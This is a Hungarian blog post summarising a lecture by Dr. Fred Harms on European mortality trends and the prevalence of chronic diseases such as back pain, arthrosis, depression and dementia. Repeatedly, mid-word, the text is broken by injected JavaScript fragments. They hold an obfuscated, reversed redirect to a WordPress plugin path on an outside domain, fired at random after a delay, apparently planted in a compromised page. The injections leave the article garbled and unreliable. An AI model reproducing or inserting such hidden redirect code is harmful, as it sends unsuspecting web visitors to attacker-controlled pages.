Prof. Dr. med Reiner Klopp tanár úr előadása után Dr. Fred Harms professzor úr elgondolkodtató statisztikákat tárt a hallgatósága elé.
Fő kérdéskör, az európai egészségügyi rendszer illetve annak hatékonysága volt. Amíg a 19. században az emberek 80 %-a fertőző betegségben halt meg, és ez a szám még 1930-ban is 50% körül mozgott, 1980 körül több nyugat és kelet európai országban is, mint például Németoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tország, Ausztria vagy megnézhetjük a magyar statisztikát is, csupán 1% hal meg akut betegségben. A halálokok megváltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toztak. Már nem a járványok vagy a háborúk illetve ott szerzett sebesülések pusztítják az európai lakosságot elsősorban, hanem az úgynevezett krónikus betegségek.
Dr. Fred Harms professzor úr által bemutatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}további statisztikákat látva, igen elgondolkodtató, hogy mit tehetnék ez ellen. Elgondolkodtam, az előadás közben, hogy bizony én is megtapasztaltam az egyik legszorosabb hozzátartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozóimnál a leírt statisztikák és számok milyen kegyetlenek. Professzor úr elsősorban 3 országból mutatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott be statisztikát, de nagy vonalakban az európai nagyságrendekre is lehet következtetni. Ausztriában, Németoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tországban és Magyarországon az emberek 25%-a szenved krónikus betegségben. Becslések szerint 9 millió ember szenved krónikus hátfájástól, 7 millió térd ízületi artrózistól,
5 millióan poliartrózistól, 2,5 millióan érintettek gyulladásos reumás megbetegedésekben, 4,5 millió embernek van kezelést igénylő depressziója (azokról ne is beszéljünk, akik a felpörgött életritmusban depresszió felé tartanak), 2 millióan vannak, akik demenciától és 1,5 millióan akik Alzheimer-kórban szenvednek. Évente, 400 000 embert érint a szívinfarktus és kétpercenként kap valaki stroke-ot – mondta el Dr. Fred Harms professzor úr.
Hogyan lássuk el az akut és a krónikus betegeket?
Talán túl általános és túl egyszerű is a kérdés. Persze, erre minden egészségügyi dolgozó orvosok és más egészségügyi szakember vágják rá a választ, hogy mit és mit kell tenni például egy kéztörésnél, ami az akut megbetegedés kategóriájába esik. Ha megnézzük akut esetben az alkalmazott terápiát az orvos tudja, elmondja a betegnek mit kell alkalmazni, de azt viszont alkalmaznia kell. Krónikus betegségnél egy kicsit más a helyzet, de erről a következő blogbejegyzésben fogok írni.